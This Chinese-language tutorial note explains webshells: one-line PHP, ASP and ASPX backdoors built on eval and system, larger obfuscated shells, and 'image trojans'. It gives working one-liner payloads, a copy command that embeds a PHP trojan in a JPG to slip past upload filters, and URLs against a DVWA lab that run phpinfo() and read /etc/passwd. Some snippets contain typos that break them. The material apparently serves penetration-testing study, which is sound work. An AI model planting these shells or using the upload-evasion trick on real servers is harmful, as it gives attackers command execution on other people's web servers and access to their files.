webshell
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
小马:一句话木马也称为小马,即整个shell代码量只有一行,一般时系统执行函数
大马:代码量和功能比小马多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到
图片马:一般直接上传木马文件都会被过滤拦截,这时候就需要用到图片马。
php 文章后面有几种php木马实践
<?php @eval('$_PSOT['admin']);?>
<?php eval($_REQUEST['admin']);?>
<?php system($_REQUEST['admin']);?>
asp
<%eval request ("admin")%>
aspx
<%@ Page Language="Jscript"%> <%eval(Request.Item["admin"],"unsafe");%>
原理:
以 php 的一句话木马为例,<?php @eval('$_PSOT['admin']);?> 语句能作为木马,其原理是利用 php 中的 eval 函数,将传入的任何语句作为 php 语句执行,因此当传入该木马时,通过访问该文件,以 post 方式传入参数,eval 函数再将接收的语句作为 php 语句执行,这就构成了连接。
其中admin是一个变量名,用来接收语句,也可以称之为密码。
@ 在php中的作用是抑制错误提示。
例如:加入已植入该木马,使用 POST 方式接收参数 phpinfo(),再通过 eval 将其作为php语句执行,就查看了站点的 php 信息。
图片马
所谓图片马,就是将一句话木马与图片相结合,使得图片中包含代码。
使用语句 生成图片马:
copy 图片.jpg/b + 木马.php/a 木马.jpg
/b 表示以二进制方式打开
/a 表示以ASCII方式打
介绍php的几种
shell.php 使用php函数 菜刀连接
<?php @eval('$_PSOT['admin']);?>
shell2.php #eveal 使用php函数,例如phpinfo();
<?php eval($_REQUEST['admin']);?>
http://192.168.0.7/dvwa/hackable/uploads/shell.php?admin=phpinfo();
**
post是想用中国菜刀之类的工具连接获取shell,是C/S架构。
request是在网页端输入变量访问**
shell3.php #systeam使用linux系统命令,例如ls,cat,rm,cp
<?php system($_REQUEST['admin']);?>
http://192.168.8.134/dvwa/hackable/uploads/shell3.php?yangge=cat /etc/passwd